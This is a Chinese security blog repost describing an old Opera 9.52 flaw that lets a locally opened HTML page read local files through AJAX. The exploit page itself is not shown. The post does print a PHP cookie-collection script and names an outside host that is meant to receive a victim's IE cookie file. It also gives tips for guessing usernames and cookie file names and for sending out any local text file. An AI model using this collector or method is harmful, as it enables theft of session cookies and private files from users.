首页 > 网络安全 > opera 9.52使用ajax读取本地文件漏洞

opera 9.52使用ajax读取本地文件漏洞

by 空虚浪子心

这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。

ff3没有这个漏洞。

不废话,看代码吧。

利用方式如下:

这段代码保存为本地htm文件,然后使用opera打开。

将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php

      
    
a.php代码:

          

   $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  
   $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];  

   $fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");    
   fwrite($fp,$_GET["cookie"]);      
   fclose($fp);    
   ?>    
a.php会按照   IP+时间+cookie.txt 格式生成一个txt文件。
例如:121.0.29.2252009-01-05 11:55:02cookie.txt

里面保存着administrator@alibaba[1].txt的内容。几点说明:1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。2,必须预测本地用户名,不过很多人都是administrator。3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个方法。4,或者你可以发送任何本地TXT文件。opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。

from:http://www.inbreak.net/?action=show&id=141

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/406

  1. 还没有评论
评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks